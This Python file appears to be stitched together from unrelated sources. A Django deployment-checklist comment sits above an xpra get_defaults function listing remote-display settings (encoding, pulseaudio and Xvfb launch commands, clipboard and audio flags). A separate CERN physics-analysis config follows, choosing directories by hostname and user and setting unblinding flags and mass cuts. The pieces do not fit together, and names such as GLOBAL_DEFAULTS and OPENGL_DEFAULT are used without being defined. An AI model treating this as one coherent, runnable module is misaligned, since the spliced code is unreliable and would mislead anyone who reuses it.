# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
def get_defaults():
    global GLOBAL_DEFAULTS
    if GLOBAL_DEFAULTS is not None:
        return GLOBAL_DEFAULTS
    from xpra.platform.features import DEFAULT_SSH_CMD
    try:
        import getpass
        username = getpass.getuser()
    except Exception:
        username = ""
    GLOBAL_DEFAULTS = {
        "encoding": "",
        "title": "@title@ on @client-machine@",
        "host": "",
        "username": username,
        "remote-xpra": ".xpra/run-xpra",
        "session-name": "",
        "client-toolkit": "",
        "dock-icon": "",
        "tray-icon": "",
        "window-icon": "",
        "password": "",
        "password-file": "",
        "clipboard-filter-file": "",
        "pulseaudio-command": "pulseaudio --start --daemonize=false --system=false "
                              + " --exit-idle-time=-1 -n --load=module-suspend-on-idle "
                              + " --load=module-null-sink --load=module-native-protocol-unix "
                              + " --log-level=2 --log-target=stderr",
        "encryption": "",
        "mode": "tcp",
        "ssh": DEFAULT_SSH_CMD,
        "xvfb": "Xvfb +extension Composite -screen 0 3840x2560x24+32 -nolisten tcp -noreset -auth $XAUTHORITY",
        "socket-dir": "",
        "log-file": "$DISPLAY.log",
        "window-layout": "",
        "quality": -1,
        "min-quality": 50,
        "speed": -1,
        "min-speed": -1,
        "port": -1,
        "compression_level": 3,
        "dpi": 96,
        "max-bandwidth": 0.0,
        "auto-refresh-delay": 0.25,
        "debug": False,
        "daemon": True,
        "use-display": False,
        "no-tray": False,
        "clipboard": True,
        "pulseaudio": True,
        "mmap": True,
        "mmap-group": False,
        "speaker": True,
        "microphone": True,
        "readonly": False,
        "keyboard-sync": True,
        "pings": False,
        "cursors": True,
        "bell": True,
        "notifications": True,
        "system-tray": True,
        "sharing": False,
        "delay-tray": False,
        "windows": True,
        "autoconnect": False,
        "exit-with-children": False,
        "opengl": OPENGL_DEFAULT,
        "speaker-codec": [],
        "microphone-codec": [],
        "key-shortcut": ["Meta+Shift+F4:quit", "Meta+Shift+F8:magic_key"],
        "bind-tcp": None,
        "start-child": None,
    }
    return GLOBAL_DEFAULTS
import getpass
import socket

if (".cern.ch" in socket.gethostname() or "lxplus" in socket.gethostname()) and getpass.getuser() == "hroskes":
    repositorydir = "/afs/cern.ch/work/h/hroskes/anomalouscouplings"
    plotsbasedir = "/afs/cern.ch/user/h/hroskes/www/anomalouscouplings/"
    host = "lxplus"
elif "login-node" in socket.gethostname() and getpass.getuser() == "*****@*****.**":
    repositorydir = "/work-zfs/lhc/heshy/ICHEPanomalouscouplings/"
    plotsbasedir = "/work-zfs/lhc/heshy/ICHEPanomalouscouplings/plots/"
    host = "MARCC"
else:
    raise ValueError("Who/where are you?")

unblinddistributions = True
unblindscans = True

expectedscanluminosity = 30

m4lmin, m4lmax = 105, 140

blindcut = lambda self: self.D_bkg_0plus() < 0.5

productionsforcombine = ("160225",)